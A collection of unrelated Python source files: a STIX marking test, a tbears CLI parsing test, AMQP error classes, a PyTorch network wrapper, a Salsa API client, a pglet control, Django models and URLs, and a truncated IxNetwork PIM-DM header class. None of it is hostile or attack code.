@pytest.mark.parametrize("data", [
([]),
([""]),
(""),
([MARKING_IDS[4], 687])
])
def test_set_marking_bad_input(data):
before = Malware(
object_marking_refs=[MARKING_IDS[0]],
**MALWARE_KWARGS
)
after = Malware(
object_marking_refs=[MARKING_IDS[0]],
**MALWARE_KWARGS
)
with pytest.raises(exceptions.InvalidValueError):
before = markings.set_markings(before, data, None)
assert before == after
| python |
# Copyright 2018 ICON Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import os
import shutil
from tbears.command.command_score import CommandScore, check_project
from tbears.tbears_exception import TBearsCommandException
from tests.test_parsing_command import TestCommand
from tests.test_util import TEST_UTIL_DIRECTORY
class TestCommandScore(TestCommand):
def setUp(self):
super().setUp()
self.tear_down_params = ['proj_unittest']
self.project = 'proj_unittest'
self.project_class = 'ProjUnittest'
self.uri = 'http://127.0.0.1:9000/api/v3'
self.mode = "install"
self.arg_from = "hxaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
self.to = "cx0000000000000000000000000000000000000000"
self.keystore = os.path.join(TEST_UTIL_DIRECTORY, 'test_keystore')
self.config_path = os.path.join(TEST_UTIL_DIRECTORY, 'test_tbears_cli_config.json')
# Test if cli arguments are parsed correctly.
def test_deploy_args_parsing(self):
# Parsing test
os.mkdir(self.project)
cmd = f"deploy {self.project} -u {self.uri} -m {self.mode} -f {self.arg_from} " \
f"-o {self.to} -k {self.keystore} -c {self.config_path} "
parsed = self.parser.parse_args(cmd.split())
self.assertEqual(parsed.command, 'deploy')
self.assertEqual(parsed.project, self.project)
self.assertEqual(parsed.uri, self.uri)
self.assertEqual(parsed.mode, self.mode)
self.assertEqual(parsed.to, self.to)
self.assertEqual(parsed.keyStore, self.keystore)
self.assertEqual(parsed.config, self.config_path)
shutil.rmtree(self.project)
# No project directory or project zip file
cmd = f'deploy {self.project}'
self.assertRaises(SystemExit, self.parser.parse_args, cmd.split())
os.mkdir(self.project)
# Invalid from address
invalid_addr = 'hx1'
cmd = f'deploy {self.project} -f {invalid_addr}'
self.assertRaises(SystemExit, self.parser.parse_args, cmd.split())
# Too many arguments
cmd = f'deploy arg1 arg2'
self.assertRaises(SystemExit, self.parser.parse_args, cmd.split())
# Insufficient argument
cmd = f'deploy'
self.assertRaises(SystemExit, self.parser.parse_args, cmd.split())
# Wrong option
cmd = f'deploy {self.project} -w wrongoption'
self.assertRaises(SystemExit, self.parser.parse_args, cmd.split())
# Not supported mode (only install, update are available)
cmd = f'deploy {self.project} -m not_supported_mode'
self.assertRaises(SystemExit, self.parser.parse_args, cmd.split())
# Invalid to address
invalid_addr = 'hx1'
cmd = f'deploy {self.project} -o {invalid_addr}'
self.assertRaises(SystemExit, self.parser.parse_args, cmd.split())
# Keystore file does not exist
cmd = f'deploy {self.project} -k ./keystore_not_exist'
self.assertRaises(SystemExit, self.parser.parse_args, cmd.split())
# config file does not exist
cmd = f'deploy {self.project} -c ./config_not_exist'
self.assertRaises(SystemExit, self.parser.parse_args, cmd.split())
shutil.rmtree(self.project)
# Deploy method (deploy, _check_deploy) test. before deploy score,
# Check if arguments satisfy requirements.
# bug: when test this method in terminal, no error found, but in pycharm Run Test, it raise error
def test_check_deploy_necessary_args(self):
# # Deploy essential check
# No project directory
cmd = f'deploy {self.project}'
self.assertRaises(SystemExit, self.parser.parse_args, cmd.split())
# Keystore file does not exist
no_keystore = './keystore_not_exist'
cmd = f'deploy {self.project} -k {no_keystore}'
self.assertRaises(SystemExit, self.parser.parse_args, cmd.split())
conf = self.cmd.cmdUtil.get_init_args(project=self.project, score_class=self.project_class)
self.cmd.cmdUtil.init(conf)
# Invalid password value
# Even though input invalid password, _check_deploy method should return password
# (this method doesn't check password value)
cmd = f'deploy {self.project} -k {self.keystore}'
user_input_password = "1234"
expected_password = "1234"
parsed = self.parser.parse_args(cmd.split())
self.assertEqual(CommandScore._check_deploy(vars(parsed), user_input_password), expected_password)
# Insufficient argument
cmd = f'deploy {self.project} -m update'
parsed = self.parser.parse_args(cmd.split())
self.assertRaises(TBearsCommandException, CommandScore._check_deploy, vars(parsed))
shutil.rmtree(self.project)
def test_check_deploy_project(self):
conf = self.cmd.cmdUtil.get_init_args(project=self.project, score_class=self.project_class)
self.cmd.cmdUtil.init(conf)
project = f"{self.project}"
# there is no __init__.py
os.rename(f"{project}/__init__.py", "__init__.py.bak")
self.assertRaises(TBearsCommandException, check_project, project)
os.rename("__init__.py.bak", f"{project}/__init__.py")
# there is no package.json
os.rename(f"{project}/package.json", "package.json.bak")
self.assertRaises(TBearsCommandException, check_project, project)
# wrong package.json file
self.touch(f"{project}/package.json")
self.assertRaises(TBearsCommandException, check_project, project)
os.rename("package.json.bak", f"{project}/package.json")
# there is no main_module file
os.rename(f"{project}/{project}.py", f"{project}.py.bak")
self.assertRaises(TBearsCommandException, check_project, project)
# working good
os.rename(f"{project}.py.bak", f"{project}/{project}.py")
self.assertEqual(check_project(project), 0)
# do not allow '/' in main_module field
os.mkdir(f"{project}/modify")
os.rename(f"{project}/{project}.py", f"{project}/modify/{project}.py")
with open(f"{project}/package.json", mode='r+') as file:
package: dict = json.load(file)
package['main_module'] = f"modify/{project}"
file.seek(0)
file.truncate()
json.dump(package, file)
self.assertRaises(TBearsCommandException, check_project, project)
# allow '.' in main_module field
with open(f"{project}/package.json", mode='r+') as file:
package: dict = json.load(file)
package['main_module'] = f"modify.{project}"
file.seek(0)
file.truncate()
json.dump(package, file)
self.assertEqual(check_project(project), 0)
def test_clear_args_parsing(self):
# Parsing test
cmd = f'clear'
parsed = self.parser.parse_args(cmd.split())
self.assertEqual(parsed.command, 'clear')
# Too many arguments
cmd = f'clear arg1 arg2'
self.assertRaises(SystemExit, self.parser.parse_args, cmd.split())
| python |
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License
#
"""
ManagementError exception class and subclasses, with status codes used by AMQP.
"""
from httplib import responses as STATUS_TEXT
from httplib import OK, NO_CONTENT, CREATED, \
BAD_REQUEST, UNAUTHORIZED, FORBIDDEN, NOT_FOUND, INTERNAL_SERVER_ERROR, NOT_IMPLEMENTED
class ManagementError(Exception):
"""
An AMQP management error.
str() gives a string with status code and text.
@ivar status: integer status code.
@ivar description: detailed description of error.
"""
def __init__(self, status, description):
self.status, self.description = status, description
super(ManagementError, self).__init__(description)
@staticmethod
def create(status, description):
"""Create the appropriate ManagementError subclass for status"""
try:
class_name = STATUS_TEXT[status].replace(' ', '') + "Status"
return globals()[class_name](description)
except KeyError:
return ManagementError(status, description)
def _error_class(status):
"""Create a ManagementError class for a particular status"""
class Error(ManagementError):
def __init__(self, description): ManagementError.__init__(self, status, description)
return Error
class BadRequestStatus(_error_class(BAD_REQUEST)): pass
class UnauthorizedStatus(_error_class(UNAUTHORIZED)): pass
class ForbiddenStatus(_error_class(FORBIDDEN)): pass
class NotFoundStatus(_error_class(NOT_FOUND)): pass
class InternalServerErrorStatus(_error_class(INTERNAL_SERVER_ERROR)): pass
class NotImplementedStatus(_error_class(NOT_IMPLEMENTED)): pass
__all__ = [
u"STATUS_TEXT", u"OK", u"NO_CONTENT", u"CREATED",
u"BAD_REQUEST", u"UNAUTHORIZED", u"FORBIDDEN", u"NOT_FOUND",
u"INTERNAL_SERVER_ERROR", u"NOT_IMPLEMENTED",
u"ManagementError",
u"BadRequestStatus", u"UnauthorizedStatus", u"ForbiddenStatus",
u"NotFoundStatus", u"InternalServerErrorStatus", u"NotImplementedStatus"]
| python |
class Grill:
"""
This is grill.
"""
| python |
import torch
from torch import nn
from copy import deepcopy
from utils import visualize_batch
class LLL_Net(nn.Module):
""" Basic class for implementing networks """
def __init__(self, model, remove_existing_head=False):
head_var = model.head_var
assert type(head_var) == str
assert not remove_existing_head or hasattr(model, head_var), \
"Given model does not have a variable called {}".format(head_var)
assert not remove_existing_head or type(getattr(model, head_var)) in [nn.Sequential, nn.Linear], \
"Given model's head {} does is not an instance of nn.Sequential or nn.Linear".format(head_var)
super(LLL_Net, self).__init__()
self.model = model
last_layer = getattr(self.model, head_var)
if remove_existing_head:
if type(last_layer) == nn.Sequential:
self.out_size = last_layer[-1].in_features
# strips off last linear layer of classifier
del last_layer[-1]
elif type(last_layer) == nn.Linear:
self.out_size = last_layer.in_features
# converts last layer into identity
# setattr(self.model, head_var, nn.Identity())
# WARNING: this is for when pytorch version is <1.2
self.model.fc = nn.Sequential()
else:
self.out_size = last_layer.out_features
self.heads = nn.ModuleList()
self.task_cls = []
self.task_offset = []
self._initialize_weights()
def add_head(self, head_architecture):
self.heads.append(head_architecture)
# we re-compute instead of append in case an approach makes changes to the heads
self.task_cls = torch.tensor([head.out_features for head in self.heads])
self.task_offset = torch.cat([torch.LongTensor(1).zero_(), self.task_cls.cumsum(0)[:-1]])
# Simplification to work on multi-head only -- returns all head outputs in a list
def forward(self, x, return_features=True):
#gx = self.model.glayer(x)
#visualize_batch(gx.cpu(),"debug")
x = self.model(x) #here birds and flowers output is 512x7x7 but in cifar is 512, did we see this bug before?
if x is tuple: #disentanglement (before "x" and after "xx" flatten operation)
xx=x[1].clone()
x=x[0]
assert (len(self.heads) > 0), "Cannot access any head"
y = []
for head in self.heads:
y.append(head(x))
if return_features and 'xx' in locals():
return y, xx
elif return_features and not 'xx' in locals():
return y, x
else:
return y
def get_copy(self):
return deepcopy(self.state_dict())
def set_state_dict(self, state_dict):
self.load_state_dict(deepcopy(state_dict))
return
def freeze_all(self):
for param in self.parameters():
param.requires_grad = False
return
def _initialize_weights(self):
# TODO: add the different initializations
pass
| python |
import json
from django.conf import settings
import requests
class SalsaException(Exception):
pass
class SalsaAPI(object):
'''
Wrapper for supporter methods:
https://help.salsalabs.com/hc/en-us/articles/224470107-Engage-API-Supporter-Data
'''
HOSTNAME = 'https://api.salsalabs.org'
SAMPLE_PUT_RESPONSE = json.dumps({
'payload': {
'count': 1,
'supporters': [
{
'firstName': '',
'lastName': '',
'address': {'postalCode': ''},
'contacts': [{
'type': 'EMAIL',
'value': '',
'status':'OPT_IN'
}],
}
]
}
})
SAMPLE_GET_RESPONSE = json.dumps({
'payload': {
'count': 1,
'supporters': [{
'result': 'FOUND',
'contacts': [{
'type': 'EMAIL',
'value': '',
'status':'OPT_IN'
}],
}]
}
})
def _make_error_message(self, error_object):
'''
Create human-readable error message from API response.
'''
return 'Invalid field "{fieldName}": {message}. {details}.\n'.format(**error_object)
def _has_valid_email(self, supporter, email_address):
'''
Determine whether a supporter has a valid contact matching the given
email address.
'''
for contact in supporter['contacts']:
email_valid = (contact['type'] == 'EMAIL' and
contact['value'] == email_address and
contact['status'] != 'HARD_BOUNCE')
if email_valid:
return True
return False
def put_supporter(self, user):
'''
Add or update supporter.
'''
endpoint = '{}/api/integration/ext/v1/supporters'.format(self.HOSTNAME)
payload = {
'supporters': [
{
'firstName': user.first_name,
'lastName': user.last_name,
'address': {'postalCode': user.userzipcode_set.get().zip_code},
'contacts': [{
'type': 'EMAIL',
'value': user.email,
'status':'OPT_IN'
}],
}
]
}
response = requests.put(
endpoint,
json={'payload': payload},
headers={'authToken': settings.SALSA_AUTH_API_KEY}
)
response_data = json.loads(response.text)
if response.status_code == 200:
supporter, = response_data['payload']['supporters']
if supporter['result'] in ('ADDED', 'UPDATED'):
return supporter
elif supporter['result'] == 'VALIDATION_ERROR':
error = ''
for e in supporter['contacts'][0].get('errors', []) + supporter['address'].get('errors', []):
error += self._make_error_message(error)
raise SalsaException(error)
else:
raise SalsaException('Supporter could not be added due to {}'.format(supporter['result']))
else:
raise SalsaException(response.text)
def get_supporter(self, email_address, allow_invalid=False):
'''
Return the first supporter with a matching email address that is valid,
i.e., does not have a status of 'HARD_BOUNCE'.
'''
endpoint = '{}/api/integration/ext/v1/supporters/search'.format(self.HOSTNAME)
payload = {
'identifiers': [email_address],
'identifierType': 'EMAIL_ADDRESS'
}
response = requests.post(endpoint,
json={'payload': payload},
headers={'authToken': settings.SALSA_AUTH_API_KEY})
if response.status_code == 200:
response_data = json.loads(response.text)
if response_data['payload']['count'] == 1:
supporter, = response_data['payload']['supporters']
if supporter['result'] == 'FOUND':
if allow_invalid:
return supporter
elif self._has_valid_email(supporter, email_address):
return supporter
else:
for supporter in response_data['payload']['supporters']:
if allow_invalid:
return supporter
elif self._has_valid_email(supporter, email_address):
return supporter
else:
raise SalsaException(response.text)
client = SalsaAPI()
| python |
from typing import Literal
from beartype._decor.main import beartype
from pglet.control import Control
POSITION = Literal[None, "left", "top", "right", "bottom"]
class Spinner(Control):
def __init__(
self,
label=None,
id=None,
label_position: POSITION = None,
size=None,
width=None,
height=None,
padding=None,
margin=None,
visible=None,
disabled=None,
):
Control.__init__(
self,
id=id,
width=width,
height=height,
padding=padding,
margin=margin,
visible=visible,
disabled=disabled,
)
self.label = label
self.size = size
self.label_position = label_position
def _get_control_name(self):
return "spinner"
# label
@property
def label(self):
return self._get_attr("label")
@label.setter
def label(self, value):
self._set_attr("label", value)
# size
@property
def size(self):
return self._get_attr("size")
@size.setter
def size(self, value):
self._set_attr("size", value)
# label_position
@property
def label_position(self):
return self._get_attr("labelPosition")
@label_position.setter
@beartype
def label_position(self, value: POSITION):
self._set_attr("labelPosition", value)
| python |
from django.conf.global_settings import AUTH_USER_MODEL
from django.contrib.auth.models import User
from django.db import models
from django.utils import timezone
class Environment(models.Model):
name = models.CharField(max_length=150)
active = models.BooleanField(default=True)
def set_environment_into_session(self, request):
request.session['environment'] = self.name
return request
def __str__(self):
return self.name
class Employee(models.Model):
user = models.ForeignKey(User, on_delete=models.CASCADE)
environment = models.ForeignKey(Environment, on_delete=models.CASCADE)
def __str__(self):
return '{} <- {}'.format(self.user, self.environment.name)
class Label(models.Model):
id = models.AutoField(primary_key=True)
name = models.CharField(max_length=150)
active = models.BooleanField(default=True)
created = models.DateTimeField(editable=False)
modified = models.DateTimeField()
def save(self, *args, **kwargs):
if not self.id:
self.created = timezone.now()
self.modified = timezone.now()
return super(Label, self).save(*args, **kwargs)
def __str__(self):
return self.name
class Product(models.Model):
id = models.AutoField(primary_key=True)
name = models.CharField(max_length=250)
active = models.BooleanField(default=True)
created = models.DateTimeField(editable=False)
modified = models.DateTimeField()
def save(self, *args, **kwargs):
if not self.id:
self.created = timezone.now()
self.modified = timezone.now()
return super(Product, self).save(*args, **kwargs)
def __str__(self):
return self.name
class Room(models.Model):
id = models.AutoField(primary_key=True)
name = models.CharField(max_length=200)
products = models.ManyToManyField(Product, through='ProductPermission')
labels = models.ManyToManyField(Label, through='LabelPermission')
active = models.BooleanField(default=True)
created = models.DateTimeField(editable=False)
modified = models.DateTimeField()
def save(self, *args, **kwargs):
if not self.id:
self.created = timezone.now()
self.modified = timezone.now()
return super(Room, self).save(*args, **kwargs)
def __str__(self):
return self.name
class Order(models.Model):
id = models.AutoField(primary_key=True)
number = models.CharField(max_length=100)
customer = models.CharField(max_length=250)
description = models.TextField(blank=True)
salesmen = models.ForeignKey(AUTH_USER_MODEL, on_delete=models.SET_NULL,
related_name='order_salesmen', null=True)
inspector = models.ForeignKey(AUTH_USER_MODEL, on_delete=models.SET_NULL,
related_name='order_inspector', null=True)
environment = models.ForeignKey(Environment, on_delete=models.SET_NULL, null=True)
rooms = models.ManyToManyField(Room, through='AllocationRoom')
active = models.BooleanField(default=True)
created = models.DateTimeField(editable=False)
modified = models.DateTimeField()
def save(self, *args, **kwargs):
if not self.id:
self.created = timezone.now()
self.modified = timezone.now()
return super(Order, self).save(*args, **kwargs)
def __str__(self):
return str(self.id)
class ProductPermission(models.Model):
id = models.AutoField(primary_key=True)
room = models.ForeignKey(Room, on_delete=models.CASCADE)
product = models.ForeignKey(Product, on_delete=models.CASCADE)
active = models.BooleanField(default=True)
created = models.DateTimeField(editable=False)
modified = models.DateTimeField()
def save(self, *args, **kwargs):
if not self.id:
self.created = timezone.now()
self.modified = timezone.now()
return super(ProductPermission, self).save(*args, **kwargs)
def __str__(self):
return str('{} <- {}'.format(self.room.name, self.product.name))
class LabelPermission(models.Model):
id = models.AutoField(primary_key=True)
room = models.ForeignKey(Room, on_delete=models.CASCADE)
label = models.ForeignKey(Label, on_delete=models.CASCADE)
active = models.BooleanField(default=True)
created = models.DateTimeField(editable=False)
modified = models.DateTimeField()
def save(self, *args, **kwargs):
if not self.id:
self.created = timezone.now()
self.modified = timezone.now()
return super(LabelPermission, self).save(*args, **kwargs)
def __str__(self):
return str('{} <- {}'.format(self.room.name, self.label.name))
class AllocationRoom(models.Model):
id = models.AutoField(primary_key=True)
order = models.ForeignKey(Order, on_delete=models.CASCADE)
room = models.ForeignKey(Room, on_delete=models.CASCADE)
active = models.BooleanField(default=True)
created = models.DateTimeField(editable=False)
modified = models.DateTimeField()
def save(self, *args, **kwargs):
if not self.id:
self.created = timezone.now()
self.modified = timezone.now()
return super(AllocationRoom, self).save(*args, **kwargs)
def __str__(self):
return str('{} <- {}'.format(self.order.id, self.room.name))
def get_product_images_path(instance, filename):
return 'product_images/{}/{}/{}.{}'.format(instance.allocation_room.order.id,
instance.allocation_room.room.name,
instance.product_permission.product.name,
filename.split('.')[-1])
class AllocationProduct(models.Model):
id = models.AutoField(primary_key=True)
product_permission = models.ForeignKey(ProductPermission, on_delete=models.CASCADE)
allocation_room = models.ForeignKey(AllocationRoom, on_delete=models.CASCADE)
active = models.BooleanField(default=True)
approved = models.BooleanField(default=False)
image = models.ImageField(blank=True, upload_to=get_product_images_path)
created = models.DateTimeField(editable=False)
modified = models.DateTimeField()
def save(self, *args, **kwargs):
if not self.id:
self.created = timezone.now()
self.modified = timezone.now()
return super(AllocationProduct, self).save(*args, **kwargs)
def __str__(self):
return str('{} <- {}'.format(self.product_permission.room.name, self.product_permission.product.name))
class AllocationLabel(models.Model):
id = models.AutoField(primary_key=True)
label_permission = models.ForeignKey(LabelPermission, on_delete=models.CASCADE)
allocation_room = models.ForeignKey(AllocationRoom, on_delete=models.CASCADE)
active = models.BooleanField(default=True)
content = models.TextField(blank=True)
created = models.DateTimeField(editable=False)
modified = models.DateTimeField()
def save(self, *args, **kwargs):
if not self.id:
self.created = timezone.now()
self.modified = timezone.now()
return super(AllocationLabel, self).save(*args, **kwargs)
def __str__(self):
return str('{} <- {}'.format(self.label_permission.room.name, self.label_permission.label.name))
| python |
from django.urls import path
from .views import UserApi, CrimeMap, EntertainmentMap, EventMap, ArtMap, DirtinessMap
from rest_framework.authtoken import views
urlpatterns = [
path('user/', UserApi.as_view(), name="user-detail"),
path('login/', views.obtain_auth_token),
path('crime/', CrimeMap.as_view(), name='crime'),
path('entertainment/', EntertainmentMap.as_view(), name='entertainment'),
path('events/', EventMap.as_view(), name='events'),
path('art/', ArtMap.as_view(), name='art'),
path('dirtiness/', DirtinessMap.as_view(), name='dirtiness'),
] | python |
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
class PimdmStateRefresh(Base):
__slots__ = ()
_SDM_NAME = 'pimdmStateRefresh'
_SDM_ATT_MAP = {
'HeaderVersion': 'pimdmStateRefreshMessage.header.version-1',
'HeaderType': 'pimdmStateRefreshMessage.header.type-2',
'HeaderReserved': 'pimdmStateRefreshMessage.header.reserved-3',
'HeaderChecksum': 'pimdmStateRefreshMessage.header.checksum-4',
'MulticastGroupAddressAddrFamily': 'pimdmStateRefreshMessage.header.multicastGroupAddress.addrFamily-5',
'MulticastGroupAddressEncodingType': 'pimdmStateRefreshMessage.header.multicastGroupAddress.encodingType-6',
'MulticastGroupAddressB': 'pimdmStateRefreshMessage.header.multicastGroupAddress.b-7',
'MulticastGroupAddressReserved': 'pimdmStateRefreshMessage.header.multicastGroupAddress.reserved-8',
'MulticastGroupAddressZ': 'pimdmStateRefreshMessage.header.multicastGroupAddress.z-9',
'MulticastGroupAddressMaskLength': 'pimdmStateRefreshMessage.header.multicastGroupAddress.maskLength-10',
'GrpAddrFieldGroupMCastAddrIP4': 'pimdmStateRefreshMessage.header.multicastGroupAddress.grpAddrField.groupMCastAddrIP4-11',
'GrpAddrFieldGroupMCastAddrIP6': 'pimdmStateRefreshMessage.header.multicastGroupAddress.grpAddrField.groupMCastAddrIP6-12',
'SourceAddressAddrFamily': 'pimdmStateRefreshMessage.header.sourceAddress.addrFamily-13',
'SourceAddressEncodingType': 'pimdmStateRefreshMessage.header.sourceAddress.encodingType-14',
'UnicastAddrAddrIPv4': 'pimdmStateRefreshMessage.header.sourceAddress.unicastAddr.addrIPv4-15',
'UnicastAddrAddrIPv6': 'pimdmStateRefreshMessage.header.sourceAddress.unicastAddr.addrIPv6-16',
'OriginatorAddressAddrFamily': 'pimdmStateRefreshMessage.header.originatorAddress.addrFamily-17',
'OriginatorAddressEncodingType': 'pimdmStateRefreshMessage.header.originatorAddress.encodingType-18',
'UnicastAddrAddrIPv4': 'pimdmStateRefreshMessage.header.originatorAddress.unicastAddr.addrIPv4-19',
'UnicastAddrAddrIPv6': 'pimdmStateRefreshMessage.header.originatorAddress.unicastAddr.addrIPv6-20',
'HeaderR': 'pimdmStateRefreshMessage.header.r-21',
'HeaderMetricPreference': 'pimdmStateRefreshMessage.header.metricPreference-22',
'HeaderMetric': 'pimdmStateRefreshMessage.header.metric-23',
'HeaderMasklength': 'pimdmStateRefreshMessage.header.masklength-24',
'HeaderTtl': 'pimdmStateRefreshMessage.header.ttl-25',
'HeaderP': 'pimdmStateRefreshMessage.header.p-26',
'HeaderN': 'pimdmStateRefreshMessage.header.n-27',
'HeaderO': 'pimdmStateRefreshMessage.header.o-28',
'HeaderReserved': 'pimdmStateRefreshMessage.header.reserved-29',
'HeaderIntervalinSec': 'pimdmStateRefreshMessage.header.intervalinSec-30',
}
def __init__(self, parent, list_op=False):
super(PimdmStateRefresh, self).__init__(parent, list_op)
@property
def HeaderVersion(self):
"""
Display Name: Version
Default Value: 2
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HeaderVersion']))
@property
def HeaderType(self):
"""
Display Name: Type
Default Value: 9
Value Format: decimal
Available enum values: State Refresh, 9
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HeaderType']))
@property
def HeaderReserved(self):
"""
Display Name: Reserved
Default Value: 0
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HeaderReserved']))
@property
def HeaderChecksum(self):
"""
Display Name: Checksum
Default Value: 0
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HeaderChecksum']))
@property
def MulticastGroupAddressAddrFamily(self):
"""
Display Name: Addr Family
Default Value: 1
Value Format: decimal
Available enum values: IPv4, 1, IPv6, 2
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['MulticastGroupAddressAddrFamily']))
@property
def MulticastGroupAddressEncodingType(self):
"""
Display Name: Encoding Type
Default Value: 0
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['MulticastGroupAddressEncodingType']))
@property
def MulticastGroupAddressB(self):
"""
Display Name: B
Default Value: 0
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['MulticastGroupAddressB']))
@property
def MulticastGroupAddressReserved(self):
"""
Display Name: Reserved
Default Value: 0
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['MulticastGroupAddressReserved']))
@property
def MulticastGroupAddressZ(self):
"""
Display Name: Z
Default Value: 0
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['MulticastGroupAddressZ']))
@property
def MulticastGroupAddressMaskLength(self):
"""
Display Name: Mask Length
Default Value: 24
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['MulticastGroupAddressMaskLength']))
@property
def GrpAddrFieldGroupMCastAddrIP4(self):
"""
Display Name: Group MCast Addr IP4
Default Value: 0.0.0.0
Value Format: iPv4
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['GrpAddrFieldGroupMCastAddrIP4']))
@property
def GrpAddrFieldGroupMCastAddrIP6(self):
"""
Display Name: Group MCast Addr IP6
Default Value: 0::0
Value Format: iPv6
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['GrpAddrFieldGroupMCastAddrIP6']))
@property
def SourceAddressAddrFamily(self):
"""
Display Name: Addr Family
Default Value: 1
Value Format: decimal
Available enum values: IPv4, 1, IPv6, 2
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SourceAddressAddrFamily']))
@property
def SourceAddressEncodingType(self):
"""
Display Name: Encoding Type
Default Value: 0
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SourceAddressEncodingType']))
@property
def UnicastAddrAddrIPv4(self):
"""
Display Name: Addr IPv4
Default Value: 0.0.0.0
Value Format: iPv4
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['UnicastAddrAddrIPv4']))
@property
def UnicastAddrAddrIPv6(self):
"""
Display Name: Addr IPv6
Default Value: 0::0
Value Format: iPv6
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['UnicastAddrAddrIPv6']))
@property
def OriginatorAddressAddrFamily(self):
"""
Display Name: Addr Family
Default Value: 1
Value Format: decimal
Available enum values: IPv4, 1, IPv6, 2
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['OriginatorAddressAddrFamily']))
@property
def OriginatorAddressEncodingType(self):
"""
Display Name: Encoding Type
Default Value: 0
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['OriginatorAddressEncodingType']))
@property
def UnicastAddrAddrIPv4(self):
"""
Display Name: Addr IPv4
Default Value: 0.0.0.0
Value Format: iPv4
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['UnicastAddrAddrIPv4']))
@property
def UnicastAddrAddrIPv6(self):
"""
Display Name: Addr IPv6
Default Value: 0::0
Value Format: iPv6
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['UnicastAddrAddrIPv6']))
@property
def HeaderR(self):
"""
Display Name: R
Default Value: 0
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HeaderR']))
@property
def HeaderMetricPreference(self):
"""
Display Name: Metric Preference
Default Value: 0
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HeaderMetricPreference']))
@property
def HeaderMetric(self):
"""
Display Name: Metric
Default Value: 0x0
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HeaderMetric']))
@property
def HeaderMasklength(self):
"""
Display Name: Masklength
Default Value: 24
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HeaderMasklength']))
@property
def HeaderTtl(self):
"""
Display Name: TTL
Default Value: 0x01
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HeaderTtl']))
@property
def HeaderP(self):
"""
Display Name: P
Default Value: 0
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HeaderP']))
@property
def HeaderN(self):
"""
Display Name: N
Default Value: 0
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HeaderN']))
@property
def HeaderO(self):
"""
Display Name: O
Default Value: 0
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HeaderO']))
@property
def HeaderReserved(self):
"""
Display Name: Reserved
Default Value: 0
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HeaderReserved']))
@property
def HeaderIntervalinSec(self):
"""
Display Name: Interval(in sec)
Default Value: 0x0
Value Format: hex
"""
